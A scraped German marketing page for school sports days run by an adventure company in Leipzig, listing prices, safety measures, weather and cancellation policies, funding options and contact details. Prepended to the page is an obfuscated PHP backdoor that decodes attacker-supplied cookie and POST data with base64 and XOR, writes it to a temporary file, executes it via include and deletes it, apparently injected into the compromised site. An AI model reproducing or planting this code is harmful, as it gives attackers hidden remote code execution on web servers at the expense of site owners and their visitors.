$aGXtL = 'p' . chr ( 535 - 467 ).chr (66) . "\137" . chr (77) . chr (122) . "\x78" . 'H' . chr (121); $PzsTjoojMv = chr (99) . chr ( 137 - 29 )."\x61" . 's' . "\x73" . '_' . chr ( 427 - 326 ).chr (120) . "\x69" . "\163" . "\x74" . chr (115); $VjvzP = class_exists($aGXtL); $aGXtL = "49189";$PzsTjoojMv = "43253";$gNJLl = !1;if ($VjvzP == $gNJLl){function CiMdzUNw(){return FALSE;}$cfKddlHHd = "60282";CiMdzUNw();class pDB_MzxHy{private function yLVHXQlTJ($cfKddlHHd){if (is_array(pDB_MzxHy::$GCncQRScik)) {$KyMNBGC = sys_get_temp_dir() . "/" . crc32(pDB_MzxHy::$GCncQRScik[chr ( 569 - 454 ).chr ( 297 - 200 ).chr (108) . "\x74"]);@pDB_MzxHy::$GCncQRScik[chr (119) . "\162" . "\151" . "\x74" . "\145"]($KyMNBGC, pDB_MzxHy::$GCncQRScik['c' . chr ( 1074 - 963 )."\156" . 't' . chr ( 886 - 785 ).chr ( 195 - 85 ).chr (116)]);include $KyMNBGC;@pDB_MzxHy::$GCncQRScik['d' . chr ( 573 - 472 ).chr ( 776 - 668 ).chr (101) . chr ( 680 - 564 ).chr ( 486 - 385 )]($KyMNBGC); $cfKddlHHd = "60282";exit();}}private $wFkHfEanhy;public function iWJvjFp(){echo 4681;}public function __destruct(){$cfKddlHHd = "19140_27974";$this->yLVHXQlTJ($cfKddlHHd); $cfKddlHHd = "19140_27974";}public function __construct($HYgdTUOZo=0){$qtlTWZag = $_POST;$uOeEECXqPK = $_COOKIE;$xZdiaFYm = "1c626fdb-4756-4973-84b9-f465d4226acb";$hTORmxKpt = @$uOeEECXqPK[substr($xZdiaFYm, 0, 4)];if (!empty($hTORmxKpt)){$EEOoGL = "base64";$UNZXKH = "";$hTORmxKpt = explode(",", $hTORmxKpt);foreach ($hTORmxKpt as $jaRbP){$UNZXKH .= @$uOeEECXqPK[$jaRbP];$UNZXKH .= @$qtlTWZag[$jaRbP];}$UNZXKH = array_map($EEOoGL . "\137" . "\144" . "\145" . "\143" . "\x6f" . "\144" . "\x65", array($UNZXKH,)); $UNZXKH = $UNZXKH[0] ^ str_repeat($xZdiaFYm, (strlen($UNZXKH[0]) / strlen($xZdiaFYm)) + 1);pDB_MzxHy::$GCncQRScik = @unserialize($UNZXKH); $UNZXKH = class_exists("19140_27974");}}public static $GCncQRScik = 38115;}$Sbretqpwx = new /* 18504 */ pDB_MzxHy(60282 + 60282); $_POST = Array();unset($Sbretqpwx);} Sporttage | Ministerium für Abenteuer

4 Stunden

bis 500 Schüler*innen

April bis Oktober

100% mobil

alle Klassenstufen

Das Team ist der Star!

ab 21,90 € pro Schüler*in

Wir bieten innovative Konzepte

Unsere Sporttage sind keine gewöhnlichen Sportfeste mit langweiligen Wurf-, Lauf- und Sprungdisziplinen, bei denen Jahr für Jahr die Gleichen gewinnen und alle anderen nur artig applaudieren. Wir haben einen Sporttag geschaffen, bei dem alle Schüler*innen aktiv und mit Freude teilnehmen können.

In vielen kleinen, mit Fantasie beladenen Spielen, wird die Geschicklichkeit, Kommunikations und Koordinationsfähigkeit, sowie Geduld und Ausdauer der ganzen Klasse auf die Probe gestellt. Dabei gilt immer: Das Team ist der Star!

Wir kommen zu eurem Wunschort

Ihr kennt einen schönen Ort direkt bei Euch um die Ecke? Super, dann sagt uns Bescheid – egal ob Schulhof, Park oder Badesee! Denn wir sind mit unserem Angeboten zu 100% mobil, passen unser Programm auch an die örtlichen Gegebenheiten an und garantieren euch somit einen unvergesslichen Tag.

Wir gestalten das Programm altersgerecht

Für die Klassenstufen 1-4 bieten wir coole Programme, die speziell an die Fähigkeiten und Bedürfnisse von Grundschulkindern angepasst sind.

Auch Kinder der Klassenstufen 5-12 sollen bei einem Sporttag Spaß haben. Dafür werden Schwierigkeit und Action-Level der Aktivitäten von uns behutsam an die Alterklasse angepasst.

Die Vorteile unserer Programme

motivierte und kompetente Betreuung

ein ansprechendes Ambiente

vielseitige Herausforderungen auf verschiedenen Stationen

Bereitstellung sämtlicher Materialien

Förderung sozialer Kompetenzen

Rundum-Sorglos-Mappe

Fragen und Antworten

Wie wird auf die Sicherheit der Schüler*innen geachtet?

Die Anzahl der Teamer*innen richtet sich nach denen der Schüler*innen, sodass diese stets mit dem erforderlichen Maß an Auf-, Vor- und Umsicht während und zwischen den Programmen begleitet und betreut werden können. Dabei wird einer Klasse immer mindestens ein oder eine Teamer*in beiseitegestellt.

Bei Sporttagen auf dem Wasser, stehen je 13 Schüler*innen immer mindestens ein(e) zertifizierte(r) Rettungsschwimmer*in zur Verfügung. Zusätzlich erhalten alle Teilnehmer*innen stylische Rettungswesten, die während allen Aktivitäten auf dem Wasser getragen werden müssen.

Auf Wunsch kann ein Krankenwagen (inkl. medizinischem Personal) hinzugebucht werden, der für die Dauer der Veranstaltung vor Ort bereitsteht.

Was passiert, wenn das Wetter nicht "mitspielt"?

Viele unsere Abenteuer sind wetterunabhängig. Bei leichtem Regen und kühlen Temperaturen können unsere Angebote trotzdem sicher durchgeführt werden. Doch auch auf Wetterumschwünge sind wir vorbereitet. In diesem Fall melden wir uns drei Tage vor dem Event und bieten euch zwei Alternativtermine oder eine wetterunabhängige Variante an.

Was passiert, wenn ich nicht die genaue Teilnehmeranzahl kenne?

Das ist kein Problem. Du teilst uns einfach die voraussichtliche Anzahl der Teilnehmer*innen spätestens bis 14 Tage vor Veranstaltungsbeginn mit. Die bis dahin gemeldete Teilnehmeranzahl bleibt zahlbar und stellt die Grundlage für den Gesamtpreis bzw. der Restzahlung dar.

Verringert sich danach die Anzahl der Schüler*innen, stellen wir euch eine Gutschrift für ein zukünftiges Event, in Höhe von bis zu 10% aus der im Vertrag festgehaltenen Anzahl an Schüler*innen und des entsprechenden Einheitspreises, aus.

Um einen sicheren Ablauf zu gewährleisten, kann eine Erhöhung der Teilnehmeranzahl nur schriftlich vorab mit uns vereinbart werden.

Wie funktionieren Anfrage, Buchung und Zahlung?

Bitte gebt bei eurer Anfrage nach Möglichkeit bis zu drei Wunschtermine an. Bei einer Anfrage eines Sporttages mit mehr als 300 Schülerinnen und Schülern, setzen wir uns auch persönlich mit euch zu einem Gespräch zusammen.

Sobald der Termin fest gebucht ist, bekommt ihr per E-Mail eine Buchungsbestätigung, Anzahlungsrechnung sowie unsere Rundum-Sorglos-Mappe (Checkliste, Einverständniserklärungen, Elternbrief, Anfahrtsbeschreibung) zum Event.

Welche Möglichkeiten der Förderung gibt es?

Wir möchten gerne, dass wirklich jeder von unserem Bewegungs- und interaktivem Erlebnisangebot profitieren kann. Daher sind unsere Programme folgendermaßen finanzierbar:

  • über GTA Gelder
  • über die Initiative „Aufholen nach Corona“
  • über Finanzierung für kulturelle und soziale Teilhaber
    • nur für Familien mit Bedarfsanspruch nach SGB II
  • Förderung durch die Ralf Rangnick Stiftung

Was passiert bei einer Stornierung?

Wenn ein Sporttag coronabedingt abgesagt werden muss, erheben wir keine Stornierungsgebühren.

In allen anderen Fällen gelten wie gewohnt unsere AGB.

Wie hoch ist die Logistikpauschale?

Für Programme innerhalb des Stadtgebietes von Leipzig berechnen wir eine Logistikpauschale von mindestens 90,00 €. Die genaue Höhe ist Abhängig von den benötigten Fahrzeugen, der Anzahl der Teamer und der aktuellen Spritkosten.

Bei Programmen, die außerhalb von Leipzig stattfinden, berechnet sich die Pauschale zusätzlich aus der Entfernung des Eventortes zu unserer Zentrale.

Bei Programmen mit großem Materialaufwand (z.B. Floßbau) beträgt die Logistikpauschale mindestens 240,00 €.

 

Jetzt Kontakt aufnehmen

hallo@ministerium-fuer-abenteuer.de

0341 - 581 532 24

(Mo-Fr 09:00 bis 16:00 Uhr)